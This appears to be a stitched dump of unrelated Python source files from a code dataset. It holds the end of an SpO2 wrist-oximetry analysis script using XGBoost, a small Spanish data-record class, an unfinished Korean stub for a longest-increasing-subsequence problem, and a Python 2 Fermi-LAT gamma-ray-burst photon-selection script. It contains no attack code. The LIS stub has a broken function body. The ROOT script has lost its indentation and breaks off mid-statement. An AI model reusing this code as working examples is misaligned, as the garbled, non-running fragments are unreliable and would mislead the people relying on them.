            learning_rate=0.1,
            n_estimators=101,
            max_depth=3,
            min_child_weight=3,
            gamma=0.3,
            subsample=0.9,
            colsample_bytree=0.6,
            scale_pos_weight=1,
            reg_alpha=0.01,
            objective='binary:logistic',
            nthread=data.N_JOBS,
            random_state=42)
        clf.fit(X_train, y_train)
        y_pred = clf.predict(X_test)
    else:
        y_pred = None
    wrist_oxygen, wrist_oxygen_clean, true_oxygen = dl.load_oxygen(test_id, y_pred=y_pred, iid=False)
    # Downsample (every 5th sample) to keep the plot readable.
    wrist_oxygen = wrist_oxygen[::5]
    wrist_oxygen_clean = wrist_oxygen_clean[::5]
    true_oxygen = true_oxygen[::5]
    if show_classifier:
        graph_df = pd.concat([wrist_oxygen, true_oxygen, wrist_oxygen_clean], axis=1, sort=True)
    else:
        graph_df = pd.concat([wrist_oxygen, true_oxygen], axis=1, sort=True)
    assert(wrist_oxygen.shape == true_oxygen.shape)
    assert(graph_df.shape[0] == wrist_oxygen.shape[0])
    # plt.figure(figsize=(4 * 1.2, 3 * 1.2))
    graph_df.plot.line(figsize=(4 * 1.2, 2 * 1.2))
    plt.xlabel("Time (Milliseconds)")
    plt.ylabel("SpO2 (%)")
    plt.ylim()
    plt.legend(loc='lower left')
    # Save as PDF (and TikZ when the classifier overlay is shown).
    if show_classifier:
        plt.savefig(data.GRAPH_CACHE + 'classifier-{}-{}.pdf'.format(test_id, str(dl)))
        tikz_save(data.LTX_CACHE + 'classifier-{}-{}.tex'.format(test_id, str(dl)))
    else:
        plt.savefig(data.GRAPH_CACHE + 'algos-{}-{}.pdf'.format(test_id, str(dl)))
def print_all_stats():
    """Print reliability stats for every top trial using the enhanced algorithm."""
    loader = data.DataLoader(window_size=100, threshold=1.0,
                             algo_name='enhanced', features='comprehensive')
    for tid in trial_sets.top_ids:
        print("\nStats for trial: {}".format(tid))
        print_stats(tid, loader)
def visualize_all_classifier_results():
    """Run leave-one-out classifier visualization for each top trial."""
    all_ids = trial_sets.top_ids
    loader = data.DataLoader(window_size=100, threshold=2.0,
                             algo_name='enhanced', features='comprehensive')
    for held_out in all_ids:
        print("Trial {}".format(held_out))
        # Train on every other trial (leave-one-out).
        train_ids = all_ids.copy()
        train_ids.remove(held_out)
        visualize_classifier_results(train_ids, held_out, loader)
def create_error_cdf():
    """Build and save a CDF plot of absolute SpO2 error for baseline, enhanced, and WristO2."""
    THRESHOLD = 2.0
    dl_enhanced = data.DataLoader(window_size=100, threshold=THRESHOLD, algo_name='enhanced', features='comprehensive')
    dl_maxim = data.DataLoader(window_size=100, threshold=THRESHOLD, algo_name='maxim', features='comprehensive')
    maxim_errors = []
    enhanced_errors = []
    wristo_errors = []
    for trial_id in trial_sets.top_ids:
        # Leave-one-out: train the classifier on all other top trials.
        training_ids = trial_sets.top_ids.copy()
        training_ids.remove(trial_id)
        X_train, y_train = dl_enhanced.load(training_ids, iid=True)
        X_test, y_test = dl_enhanced.load([trial_id], iid=False)
        # Same tuned hyperparameters as visualize_classifier_results above.
        clf = xgb.XGBClassifier(
            learning_rate=0.1,
            n_estimators=101,
            max_depth=3,
            min_child_weight=3,
            gamma=0.3,
            subsample=0.9,
            colsample_bytree=0.6,
            scale_pos_weight=1,
            reg_alpha=0.01,
            objective='binary:logistic',
            nthread=data.N_JOBS,
            random_state=42)
        clf.fit(X_train, y_train)
        y_pred = clf.predict(X_test)
        wrist_enhanced, wrist_clean, fingertip_enhanced = dl_enhanced.load_oxygen(trial_id, y_pred=y_pred, iid=False)
        wrist_maxim, _, fingertip_maxim = dl_maxim.load_oxygen(trial_id, iid=False)
        wrist_maxim = wrist_maxim.values.flatten()
        wrist_enhanced = wrist_enhanced.values.flatten()
        fingertip_maxim = fingertip_maxim.values.flatten()
        fingertip_enhanced = fingertip_enhanced.values.flatten()
        wrist_clean = wrist_clean.values.flatten()
        # NOTE(review): all three errors are computed against oMF
        # (fingertip_maxim); oEF (fingertip_enhanced) is unpacked but never
        # used — confirm this is intentional.
        for oM, oE, oMF, oEF, oC in zip(wrist_maxim, wrist_enhanced, fingertip_maxim, fingertip_enhanced, wrist_clean):
            maxim_errors.append(np.abs(np.subtract(oM, oMF)))
            enhanced_errors.append(np.abs(np.subtract(oE, oMF)))
            wristo_errors.append(np.abs(np.subtract(oC, oMF)))
    maxim_errors = np.array(maxim_errors)
    enhanced_errors = np.array(enhanced_errors)
    wristo_errors = np.array(wristo_errors)
    # Drop NaN entries before building the empirical CDFs.
    maxim_errors = maxim_errors[~np.isnan(maxim_errors)]
    enhanced_errors = enhanced_errors[~np.isnan(enhanced_errors)]
    wristo_errors = wristo_errors[~np.isnan(wristo_errors)]
    rmses = [maxim_errors, enhanced_errors, wristo_errors]
    plt.figure(figsize=(4 * 1.2, 2 * 1.2))
    for e in rmses:
        sorted_data = np.sort(e)
        yvals = np.arange(len(sorted_data)) / float(len(sorted_data) - 1)
        plt.plot(sorted_data, yvals)
    plt.legend(['Baseline', 'Enhanced', 'WristO2'])
    plt.ylim(0.0, 1.0)
    plt.xlim(0.0, 10.0)
    plt.xlabel('Absolute Error')
    plt.savefig(data.GRAPH_CACHE + 'cdf-error-algo.pdf')
    tikz_save(data.LTX_CACHE + 'cdf-error-algo.tex')
def create_fingertip_cdf():
    """Build and save a CDF of squared error between reflective and transitive fingertip SpO2.

    Also dumps the raw (reflective, transitive) pairs to a CSV file in the
    graph cache directory.
    """
    THRESHOLD = 2.0
    dl = data.DataLoader(window_size=100, threshold=THRESHOLD, algo_name='enhanced', features='comprehensive')
    fingertip_error = []
    # Fix: use a context manager so the CSV handle is closed even if a
    # data-loading call raises (the original only closed it at the very end).
    with open(data.GRAPH_CACHE + 'csv-fingertip.csv', 'w') as csv_file:
        csvwriter = csv.writer(csv_file, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL)
        csvwriter.writerow(['reflective', 'transitive'])
        for trial_id in trial_sets.top_ids:
            wrist_oxygen, fingertip_oxygen, transitive_oxygen = dl.load_all_oxygen(trial_id)
            for oF, oT in zip(fingertip_oxygen, transitive_oxygen):
                csvwriter.writerow([oF, oT])
                fingertip_error.append(np.square(np.subtract(oF, oT)))
    fingertip_error = np.array(fingertip_error)
    # Drop NaN entries before building the empirical CDF.
    fingertip_error = fingertip_error[~np.isnan(fingertip_error)]
    plt.figure()
    sorted_data = np.sort(fingertip_error)
    yvals = np.arange(len(sorted_data)) / float(len(sorted_data) - 1)
    plt.plot(sorted_data, yvals)
    # plt.legend(['Baseline', 'Enhanced'])
    plt.ylim(0.0, 1.0)
    plt.xlabel('RMSE')
    plt.savefig(data.GRAPH_CACHE + 'cdf-fingertip.pdf')
if __name__ == '__main__':
    # Uncomment the analyses you want to (re)generate.
    # print_all_stats()
    visualize_all_classifier_results()
    create_error_cdf()
    # create_fingertip_cdf()
|
5,158 | 95256390e1e7e9227b96dccce33082de9d2cddd3 | import datetime
class Dato:
    """Simple record holding a datum along with its type and a timestamp."""

    def __init__(self, id: int, dato: str, tipo: str, fecha: datetime.datetime):
        self.__id = id        # unique identifier
        self.__dato = dato    # stored value
        self.__tipo = tipo    # kind/category of the datum
        self.__fecha = fecha  # timestamp associated with the datum

    def getId(self) -> int:
        return self.__id

    def setId(self, id: int) -> None:
        self.__id = id

    def getDato(self) -> str:
        return self.__dato

    def setDato(self, dato: str) -> None:
        self.__dato = dato

    def getTipo(self) -> str:
        return self.__tipo

    def setTipo(self, tipo: str) -> None:
        self.__tipo = tipo

    def getFecha(self) -> datetime.datetime:
        return self.__fecha

    def setFecha(self, fecha: datetime.datetime) -> None:
        self.__fecha = fecha
5,159 | afccf460bcf04f38b8c66177c86debd39a1b165f | # [백준] https://www.acmicpc.net/problem/11053 가장 긴 증가하는 부분 수열
# 일단 재귀식으로 풀어보기
# 이분탐색 어떻게 할 지 모르겠다
import sys
N = int(sys.stdin.readline().strip())
A = list(map(int, sys.stdin.readline().split()))
def recur():
if A[i] < A[i-1]:
|
5,160 | 66cdeaa106a8f22dbfd64c12c4cb04fdb9f5b453 | #!/usr/bin/env python
import sys
import ROOT
from ROOT import TTree
from ROOT import TChain
import numpy as np
import yaml
import xml.etree.ElementTree as ET
import datetime
#sys.path.append("/disk/gamma/cta/store/takhsm/FermiMVA/AllSky")
#sys.path.append("/home/takhsm/FermiMVA/python")
ROOT.gROOT.SetBatch()
from array import array
import math
from math import cos, sin, tan, acos, asin, atan, radians, degrees
from pColor import *
ROOT.gStyle.SetPadGridX(True)
ROOT.gStyle.SetPadGridY(True)
ROOT.gStyle.SetPadTickX(True)
ROOT.gStyle.SetPadTickY(True)
#from pCutBDT import cutBDT
from pAnalysisConfig import *
# ----- Event class setup -----
par = sys.argv
cfg = ClassConfig('Both', [10, 3, 1], 1)
aCutEGB = cfg.aCutEGB
aaStrSelect = cfg.aaStrSelect
nStartBin = cfg.nStartBin
nameFileRoc = "/nfs/farm/g/glast/u/mtakahas/v20r09p09_G1haB1/S18/S16V200909_020RAWE20ZDIR010ZCS000wwoTRKwoMCZDIR00woRWcatTwoZDIR050_15/S16V200909_020RAWE20ZCS000wwoTRKwoMCZDIR00woRW_15_S11D_catTwoZDIR050Log_roc.root" #par[2]
nameVarBDT = "S16V200909_020RAWE20ZDIR010ZCS000wwoTRKwoMCZDIR00woRWcatTwoZDIR050_15_BDTG1000D06"
nameVarBDT = par[1]
nameFileSuffix = par[1]
cutMVA = CutBDT(nameFileRoc, aCutEGB)
aaValCutBDT = cutMVA.aaValCutBDT[0:]
print aaValCutBDT
nEnergyBin = cutMVA.aaValCutBDT[0]['numBin'] - nStartBin
vEnergyBinWidth = cutMVA.aaValCutBDT[0]['widthBin']
vEnergyLow = cutMVA.aaValCutBDT[0]['edgeLow'] + nStartBin*vEnergyBinWidth
vEnergyUp = vEnergyLow + nEnergyBin*vEnergyBinWidth
aaNumEventClass=[]
#aColor = []
for hS in range(len(aaStrSelect)):
aaNumEventClass.append([])
for iS in range(len(aaStrSelect[hS])):
aaNumEventClass[hS].append(0)
#IRF
listPathFilePerf = [['/nfs/farm/g/glast/u/mtakahas/v20r09p09_G1haB1/S16/S16V200909_020RAWE20ZDIR010ZCS000wwoTRKwoMCZDIR00woRWcatTwoZDIR050_15/S16V200909_020RAWE20ZDIR010ZCS000wwoTRKwoMCZDIR00woRWcatTwoZDIR050_15_P8R2_TRANSIENT100_P8R2_TRANSIENT100_perf.root', '/nfs/farm/g/glast/u/mtakahas/v20r09p09_G1haB1/S16/S16V200909_020RAWE20ZDIR010ZCS000wwoTRKwoMCZDIR00woRWcatTwoZDIR050_15/S16V200909_020RAWE20ZDIR010ZCS000wwoTRKwoMCZDIR00woRWcatTwoZDIR050_15_P8R2_SOURCE_P8R2_SOURCE_perf.root'],
['/nfs/farm/g/glast/u/mtakahas/v20r09p09_G1haB1/S16/S16V200909_020RAWE20ZDIR010ZCS000wwoTRKwoMCZDIR00woRWcatTwoZDIR050_15/S16V200909_020RAWE20ZDIR010ZCS000wwoTRKwoMCZDIR00woRWcatTwoZDIR050_15_CalOnly_R100_perf.root', '/nfs/farm/g/glast/u/mtakahas/v20r09p09_G1haB1/S16/S16V200909_020RAWE20ZDIR010ZCS000wwoTRKwoMCZDIR00woRWcatTwoZDIR050_15/S16V200909_020RAWE20ZDIR010ZCS000wwoTRKwoMCZDIR00woRWcatTwoZDIR050_15_CalOnly_R30_perf.root', '/nfs/farm/g/glast/u/mtakahas/v20r09p09_G1haB1/S16/S16V200909_020RAWE20ZDIR010ZCS000wwoTRKwoMCZDIR00woRWcatTwoZDIR050_15/S16V200909_020RAWE20ZDIR010ZCS000wwoTRKwoMCZDIR00woRWcatTwoZDIR050_15_CalOnly_R10_perf.root']]
htgPerf = CutPerformanceHtg(listPathFilePerf)
# Data
pathList = "/nfs/farm/g/glast/u/mtakahas/data/catalogue/PublicTableGRBs.xml"
fileList = ET.parse(pathList)
rtXml = fileList.getroot()
# OFF regions
nOff = 4;
degOffOffset = 14.0;
print "===================="
# Making all sky map
listFileIn = par[2:]
print listFileIn
aliasSelections = yaml.load(open('/afs/slac.stanford.edu/u/gl/mtakahas/eventSelect/config/pass8_event_selections.yaml','r'))
for nameFileIn in listFileIn:
print ""
print "========================================================================"
fileIn = ROOT.TFile(nameFileIn, "READ")
print fileIn.GetName()
print "========================================================================"
chainData = fileIn.Get("MeritTuple")
nameFileFriend = nameFileIn.replace(".root", "_" + nameVarBDT + ".root")
chainData.AddFriend("friendTemp=MeritTuple", nameFileFriend)
for k,v in aliasSelections.iteritems():
chainData.SetAlias(k,v)
nameFileOut = nameFileIn[:-5] + "_PHOTON_" + nameVarBDT + nameFileSuffix + ".root"
fileOut = ROOT.TFile(nameFileOut, 'UPDATE')
#------ Source data -----
indexGrbName = nameFileIn.rindex('GRB') + 3
indexGrbNameEnd = indexGrbName + 9
nameGrb = nameFileIn[indexGrbName:indexGrbNameEnd]
for grb in rtXml: #for iGrb in range(trList.GetEntries())
if grb.findtext("./GRBNAME")==nameGrb:
trigger_time = float(grb.findtext("./MET"))
if grb.findtext("./ERROR") == "--" or grb.findtext("./ERROR") == "":
if grb.findtext("./LATERROR") == "--" or grb.findtext("./LATERROR") == "":
err_rad = 0.
else:
err_rad = float(grb.findtext("./LATERROR"))
else:
if float(grb.findtext("./ERROR")) > float(grb.findtext("./LATERROR")):
err_rad = float(grb.findtext("./LATERROR"))
raSrc = float(grb.findtext("./LATRA"))
decSrc = float(grb.findtext("./LATDEC"))
else:
err_rad = float(grb.findtext("./ERROR"))
raSrc = float(grb.findtext("./RA"))
decSrc = float(grb.findtext("./DEC"))
print ""
print "==============="
print "GRB", nameGrb
print "==============="
print "(", raSrc, ",", decSrc, "), Error radius:", err_rad, "Trigger MET:", trigger_time
nEvent = chainData.GetEntries()
print "Total number of events:", nEvent
#distCut = min(7.0, 5.0+err_rad)
# Plot
#mgr = ROOT.TMultiGraph("mgr", "Gamma-like events within {0} deg".format(distCut))
mgr = ROOT.TMultiGraph("mgr", "Gamma-like events around the GRB")
greOn = []
greOff=[]
for pC in range(len(aaStrSelect)):
greOn.append([])
greOff.append([])
for qC in range(len(aaStrSelect[pC])):
greOn[-1].append(ROOT.TGraphErrors())
greOn[-1][-1].SetName("greOn_{0}_{1}".format(pC, qC))
greOn[-1][-1].SetTitle("{0} ON".format(aaStrSelect[pC][qC]))
greOn[-1][-1].SetMarkerStyle(20)
if pC==0:
greOn[-1][-1].SetMarkerColor(13-12*qC)
elif pC==1:
greOn[-1][-1].SetMarkerColor(kRed+3*(qC-2))
greOn[-1][-1].SetMarkerStyle(20)
mgr.Add(greOn[-1][-1])
greOff[-1].append([])
for hRegio in range(nOff):
greOff[-1][-1].append(ROOT.TGraphErrors())
greOff[-1][-1][-1].SetName("greOff_{0}_{1}_{2}".format(pC, qC, hRegio+1))
greOff[-1][-1][-1].SetTitle("{0} Off{1} events".format(aaStrSelect[pC][qC], hRegio+1))
if pC==0:
greOff[-1][-1][-1].SetMarkerColor(13-12*qC)
elif pC==1:
greOff[-1][-1][-1].SetMarkerColor(kRed+3*(qC-2))
greOff[-1][-1][-1].SetMarkerStyle(25+hRegio)
mgr.Add(greOff[-1][-1][-1])
mgrZenith = ROOT.TMultiGraph("mgrZenith", "Zenith angle within ON/OFF regions")
grZenith = []
for gRegio in range(nOff+1):
grZenith.append(ROOT.TGraph())
grZenith[-1].SetName("grZenith{0}".format(gRegio))
if gRegio==0:
grZenith[0].SetTitle("ON")
else:
grZenith[gRegio].SetTitle("OFF{0}".format(gRegio))
grZenith[gRegio].SetMarkerStyle(7)
grZenith[gRegio].SetMarkerColor(akColor(gRegio))
mgrZenith.Add(grZenith[-1])
#------ TTree setting -----
trm = []
c = np.zeros(1, dtype=np.int32)
s = np.zeros(1, dtype=np.int32)
ty = np.zeros(1, dtype=np.int32)
ngrb = np.zeros(1, dtype=int)
evid = np.zeros(1, dtype=int)
run = np.zeros(1, dtype=int)
e = np.zeros(1, dtype=float)
t = np.zeros(1, dtype=float)
lt = np.zeros(1, dtype=float)
ra = np.zeros(1, dtype=float)
dec = np.zeros(1, dtype=float)
l = np.zeros(1, dtype=float)
b = np.zeros(1, dtype=float)
z = np.zeros(1, dtype=float)
az = np.zeros(1, dtype=float)
bep = np.zeros(1, dtype=float)
p = np.zeros(1, dtype=float)
ctp = np.zeros(1, dtype=float)
rawe = np.zeros(1, dtype=float)
cth = np.zeros(1, dtype=float)
th = np.zeros(1, dtype=float)
phi = np.zeros(1, dtype=float)
dist = np.zeros(1, dtype=float)
grbt = np.zeros(1, dtype=float)
flag = np.zeros(1, dtype=int)
# for iRegio in range(1+nOff):
#if iRegio==0:
#trm.append(ROOT.TTree("trGammas", "Gamma-like events"))
trm = ROOT.TTree("trGammas", "Gamma-like events")
#else:
# trm.append(ROOT.TTree("trGammasOFF{0}".format(iRegio), "Gamma-like events in the OFF region {0}".format(iRegio)))
trm.Branch('Category',c,'c/I') # 1:CalTkr or 2:CalOnly
trm.Branch('EVENT_CLASS',s,'s/I') # 4: TRANSIENT100, 128: SOURCE, 4096: CalOnly_10xEGB, 8192: CalOnly_3xEGB, 16384: CalOnly_1xEGB
trm.Branch('EVENT_TYPE',ty,'ty/I') # 1: FRONT, 2: BACK, 4, PSF0, ... , 32: PSF3, 64: EDISP0, ... , 512: EDISP3
trm.Branch('GRB_NAME',ngrb,'ngrb/I') #EvtEventId
trm.Branch('EVENT_ID',evid,'evid/I') #EvtEventId
trm.Branch('RUN_ID',run,'run/I') #EvtRun
trm.Branch('ENERGY',e,'e/D') #FT1Energy
trm.Branch('TIME',t,'t/D') #EvtElapsedTime
trm.Branch('LIVETIME',lt,'lt/D') #EvtLiveTime
trm.Branch('RA',ra,'ra/D') #FT1Ra
trm.Branch('DEC',dec,'dec/D') #FT1Dec
trm.Branch('L',l,'l/D') #FT1L
trm.Branch('B',b,'b/D') #FT1B
trm.Branch('ZENITH_ANGLE',z,'z/D') #FT1ZenithTheta
trm.Branch('EARTH_AZIMUTH_ANGLE',az,'az/D') #FT1EarthAzimuth
trm.Branch('WP8CTCalOnlyBestEnergyProb',bep,'bep/D') # (WP8CalOnlyBEPCaseE_myBDT+1.0)/2.0
trm.Branch('WP8CTCalOnlyProb',p,'p/D') # (S16V200909_020RAWE20ZDIR010ZCS000wwoTRKwoMCZDIR00woRWcatTwoZDIR050_15_BDTG1000D06+1.0)/2.0
trm.Branch('WP8CTAllProb',ctp,'ctp/D') #WP8CTAllProb
trm.Branch('CalEnergyRaw',rawe,'rawe/D') #CalEnergyRaw
trm.Branch('CosTHETA',cth,'cth/D') #
trm.Branch('THETA',th,'th/D') # FT1Theta or -Cal1MomZDir
trm.Branch('PHI',phi,'phi/D') # FT1Phi or Cal1MomYDir/Cal1MomXDir
trm.Branch('DIST',dist,'dist/D')
trm.Branch('GRB_TIME',grbt,'grbt/D')
trm.Branch('FLAG',flag,'flag/I') #flag for this GRB, 0: On, 1,2,3,4,...: Off, -1: Other
timeStart = datetime.datetime.now()
#print timeStart
vecTgt = []
vecTgt.append(np.array([cos(radians(decSrc))*cos(radians(raSrc)), cos(radians(decSrc))*sin(radians(raSrc)), sin(radians(decSrc))]))
vecTgt.append(np.array([cos(radians(decSrc-degOffOffset))*cos(radians(raSrc)), cos(radians(decSrc-degOffOffset))*sin(radians(raSrc)), sin(radians(decSrc-degOffOffset))]))
vecTgt.append(np.array([cos(radians(decSrc))*cos(radians(raSrc-degOffOffset/cos(radians(decSrc)))), cos(radians(decSrc))*sin(radians(raSrc-degOffOffset/cos(radians(decSrc)))), sin(radians(decSrc))]))
vecTgt.append(np.array([cos(radians(decSrc+degOffOffset))*cos(radians(raSrc)), cos(radians(decSrc+degOffOffset))*sin(radians(raSrc)), sin(radians(decSrc+degOffOffset))]))
vecTgt.append(np.array([cos(radians(decSrc))*cos(radians(raSrc+degOffOffset/cos(radians(decSrc)))), cos(radians(decSrc))*sin(radians(raSrc+degOffOffset/cos(radians(decSrc)))), sin(radians(decSrc))]))
for iEvent in range(nEvent):
chainData.GetEntry(iEvent)
flag[0] = -1;
e[0] = chainData.EvtJointLogEnergy
rawe[0] = chainData.CalEnergyRaw
c[0] = 0
s[0] = 0
ty[0] = 0
ngrb[0] = float(nameGrb)
evid[0] = chainData.EvtEventId
run[0] = chainData.EvtRun
t[0] = chainData.EvtElapsedTime
grbt[0] = t[0] - trigger_time
lt[0] = chainData.EvtLiveTime
bep[0] = (chainData.WP8CalOnlyBEPCaseE_myBDT+1.0)/2.0
p[0] = (chainData.S16V200909_020RAWE20ZDIR010ZCS000wwoTRKwoMCZDIR00woRWcatTwoZDIR050_15_BDTG1000D06+1.0)/2.0
ctp[0] = chainData.WP8CTAllProb
binEnergy = max(min(nEnergyBin-1, int((e[0]-vEnergyLow)/vEnergyBinWidth * (int(e[0]<vEnergyLow)*(-2)+1)) ), 0)
if (chainData.TkrNumTracks>0) and (math.log10(max(chainData.CalTrackAngle,1E-4)) <= (0.529795)*(e[0] < 3.000000) + ((1.0)*((0.529795)*(1.0)+(-1.379791)*(pow((e[0]-3.000000)/0.916667,1))+(0.583401)*(pow((e[0]-3.000000)/0.916667,2))+(-0.075555)*(pow((e[0]-3.000000)/0.916667,3))))*(e[0] >= 3.000000 and e[0] <= 5.750000) + (-0.398962)*(e[0] > 5.750000)) and chainData.EvtCalCsIRLn>4 and chainData.WP8CTPSFTail>0.05 and chainData.WP8CTBestEnergyProb>0.1 and chainData.FswGamState == 0: # CalTkr
c[0] = 1
z[0] = chainData.FT1ZenithTheta
az[0] = chainData.FT1EarthAzimuth
ra[0] = chainData.FT1Ra
dec[0] = chainData.FT1Dec
l[0] = chainData.FT1L
b[0] = chainData.FT1B
cth[0] = chainData.Cal1MomZDir
th[0] = chainData.FT1Theta
phi[0] = chainData.FT1Phi
if ( -math.log10(1.0-ctp[0]) >= (0.010000)*(e[0] < 1.250000) + ((e[0] <= 1.750000)*((0.010000)*(1.0)+(0.000000)*(math.pow((e[0]-1.250000)/0.500000,1))+(0.018669)*(math.pow((e[0]-1.250000)/0.500000,2)))+((e[0] > 1.750000)*(e[0] <= 2.250000))*((0.028669)*(1.0)+(0.037338)*(math.pow((e[0]-1.750000)/0.500000,1))+(-0.017111)*(math.pow((e[0]-1.750000)/0.500000,2)))+((e[0] > 2.250000)*(e[0] <= 2.750000))*((0.048897)*(1.0)+(0.003117)*(math.pow((e[0]-2.250000)/0.500000,1))+(0.001967)*(math.pow((e[0]-2.250000)/0.500000,2)))+((e[0] > 2.750000)*(e[0] <= 3.250000))*((0.053980)*(1.0)+(0.007050)*(math.pow((e[0]-2.750000)/0.500000,1))+(-0.003525)*(math.pow((e[0]-2.750000)/0.500000,2)))+((e[0] > 3.250000)*(e[0] <= 3.750000))*((0.057505)*(1.0)+(0.000000)*(math.pow((e[0]-3.250000)/0.500000,1))+(0.121963)*(math.pow((e[0]-3.250000)/0.500000,2)))+((e[0] > 3.750000)*(e[0] <= 4.250000))*((0.179468)*(1.0)+(0.243925)*(math.pow((e[0]-3.750000)/0.500000,1))+(0.493075)*(math.pow((e[0]-3.750000)/0.500000,2)))+((e[0] > 4.250000)*(e[0] <= 4.750000))*((0.916468)*(1.0)+(1.230076)*(math.pow((e[0]-4.250000)/0.500000,1))+(-0.501532)*(math.pow((e[0]-4.250000)/0.500000,2)))+(e[0] > 4.750000)*((1.645012)*(1.0)+(0.227011)*(math.pow((e[0]-4.750000)/0.500000,1))+(0.029483)*(math.pow((e[0]-4.750000)/0.500000,2))))*(e[0] >= 1.250000 and e[0] <= 5.750000) + (2.216967)*(e[0] > 5.750000) ): #P8R1_TRANSIENT_R100
if ( -math.log10(1.0-ctp[0]) >= (0.080914)*(e[0] < 1.250000) + ((e[0] <= 1.750000)*((0.080914)*(1.0)+(0.108897)*(pow((e[0]-1.250000)/0.500000,1))+(0.377870)*(pow((e[0]-1.250000)/0.500000,2)))+((e[0] > 1.750000)*(e[0] <= 2.250000))*((0.567682)*(1.0)+(0.864637)*(pow((e[0]-1.750000)/0.500000,1))+(-0.182318)*(pow((e[0]-1.750000)/0.500000,2)))+((e[0] > 2.250000)*(e[0] <= 2.750000))*((1.250000)*(1.0)+(0.500000)*(pow((e[0]-2.250000)/0.500000,1))+(-0.085000)*(pow((e[0]-2.250000)/0.500000,2)))+((e[0] > 2.750000)*(e[0] <= 3.250000))*((1.665000)*(1.0)+(0.330000)*(pow((e[0]-2.750000)/0.500000,1))+(-0.165000)*(pow((e[0]-2.750000)/0.500000,2)))+((e[0] > 3.250000)*(e[0] <= 3.750000))*((1.830000)*(1.0)+(0.000000)*(pow((e[0]-3.250000)/0.500000,1))+(0.285000)*(pow((e[0]-3.250000)/0.500000,2)))+((e[0] > 3.750000)*(e[0] <= 4.250000))*((2.115000)*(1.0)+(0.570000)*(pow((e[0]-3.750000)/0.500000,1))+(-0.185000)*(pow((e[0]-3.750000)/0.500000,2)))+((e[0] > 4.250000)*(e[0] <= 4.750000))*((2.500000)*(1.0)+(0.200000)*(pow((e[0]-4.250000)/0.500000,1))+(0.100000)*(pow((e[0]-4.250000)/0.500000,2)))+(e[0] > 4.750000)*((2.800000)*(1.0)+(0.400000)*(pow((e[0]-4.750000)/0.500000,1))+(-0.112171)*(pow((e[0]-4.750000)/0.500000,2))))*(e[0] >= 1.250000 and e[0] <= 5.750000) + (3.151318)*(e[0] > 5.750000) ) and ( chainData.WP8CTAllBkProb >= (0.366167)*(e[0] < 1.250000) + ((e[0] <= 1.541667)*((0.366167)*(1.0)+(0.028500)*(pow((e[0]-1.250000)/0.291667,1))+(-0.056500)*(pow((e[0]-1.250000)/0.291667,2))+(0.106667)*(pow((e[0]-1.250000)/0.291667,3)))+((e[0] > 1.541667)*(e[0] <= 1.833333))*((0.444833)*(1.0)+(0.235500)*(pow((e[0]-1.541667)/0.291667,1))+(0.263500)*(pow((e[0]-1.541667)/0.291667,2))+(-0.162667)*(pow((e[0]-1.541667)/0.291667,3)))+((e[0] > 1.833333)*(e[0] <= 2.125000))*((0.781167)*(1.0)+(0.274500)*(pow((e[0]-1.833333)/0.291667,1))+(-0.224500)*(pow((e[0]-1.833333)/0.291667,2))+(0.072667)*(pow((e[0]-1.833333)/0.291667,3)))+(e[0] > 
2.125000)*((0.903833)*(1.0)+(0.043500)*(pow((e[0]-2.125000)/0.291667,1))+(-0.006500)*(pow((e[0]-2.125000)/0.291667,2))+(-0.000333)*(pow((e[0]-2.125000)/0.291667,3))))*(e[0] >= 1.250000 and e[0] <= 3.000000) + (0.966833)*(e[0] > 3.000000) ): #P8R1_SOURCE_AllProbFilter&&P8R1_SOURCE_AllBkProbFilter
s[0] = 128#3
aaNumEventClass[0][1] = aaNumEventClass[0][1]+1
else:
s[0] = 4#1
aaNumEventClass[0][0] = aaNumEventClass[0][0]+1
#trm.Fill()
elif chainData.Cal1RawEnergySum>=20000 and chainData.Cal1MomZDir>=0.1 and chainData.Cal1MomZCrossSide840>=0.0 and (chainData.WP8CalOnlyBEPCaseE_myBDT+1.0)/2.0>0.06 and (chainData.TkrNumTracks==0 or (math.log10(max(chainData.CalTrackAngle,1E-4)) > (0.529795)*(e[0] < 3.000000) + ((1.0)*((0.529795)*(1.0)+(-1.379791)*(pow((e[0]-3.000000)/0.916667,1))+(0.583401)*(pow((e[0]-3.000000)/0.916667,2))+(-0.075555)*(pow((e[0]-3.000000)/0.916667,3))))*(e[0] >= 3.000000 and e[0] <= 5.750000) + (-0.398962)*(e[0] > 5.750000))) and chainData.Acd2Cal1VetoSigmaHit>0 and chainData.Cal1TransRms>=10 and chainData.Cal1TransRms<70 and chainData.Cal1MomNumIterations>0 and chainData.FswGamState == 0: # CalOnly
c[0] = 2
z[0] = chainData.FT1CalZenithTheta
az[0] = chainData.FT1CalEarthAzimuth
ra[0] = chainData.FT1CalRa
dec[0] = chainData.FT1CalDec
l[0] = chainData.FT1CalL
b[0] = chainData.FT1CalB
cth[0] = chainData.Cal1MomZDir
th[0] = math.degrees(math.acos(chainData.Cal1MomZDir))
phi[0] = math.degrees(math.atan2(chainData.Cal1MomYDir, chainData.Cal1MomXDir))
if -math.log10(1.0-p[0])>aaValCutBDT[binEnergy+nStartBin][0]: #CalOnly_R100
if -math.log10(1.0-p[0])>aaValCutBDT[binEnergy+nStartBin][1]: #CalOnly_R30
if -math.log10(1.0-p[0])>aaValCutBDT[binEnergy+nStartBin][2]: #CalOnly_R10
s[0]=16384#3
aaNumEventClass[1][2] = aaNumEventClass[1][2]+1
else:
s[0] = 8192#2
aaNumEventClass[1][1] = aaNumEventClass[1][1]+1
else:
s[0] = 4096#1
aaNumEventClass[1][0] = aaNumEventClass[1][0]+1
if(e[0]<4.55 or cth[0]<0.6):
ty[0] = ty[0]+2 #BACK
else:
ty[0] = ty[0]+1 #FRONT
vecEvt = np.array([cos(radians(dec[0]))*cos(radians(ra[0])), cos(radians(dec[0]))*sin(radians(ra[0])), sin(radians(dec[0]))])
aDist = []
distCut = htgPerf.getPSF95_cth(c[0]-1, 0*(s[0]==4 or s[0]==4096)+1*(s[0]==128 or s[0]==8192)+2*(s[0]==16384), e[0], cth[0]) + err_rad
for iRegio in range(1+nOff):
radTheta = acos(np.dot(vecTgt[iRegio], vecEvt))
aDist.append(degrees(radTheta))
if iRegio==0:
dist[0] = aDist[0]
if aDist[iRegio] < distCut:
grZenith[iRegio].SetPoint(grZenith[iRegio].GetN(), t[0]-trigger_time, z[0])
#if s[0]>0:
#print "============================"
if iRegio==0:
flag[0] = 0
if s[0]>0:
print ""
print "== ON photon candidate!!! =="
if c[0] == 1:
if s[0] == 4:
greOn[0][0].SetPoint(greOn[0][0].GetN(), t[0]-trigger_time, pow(10, e[0]-3))
elif s[0] == 128:
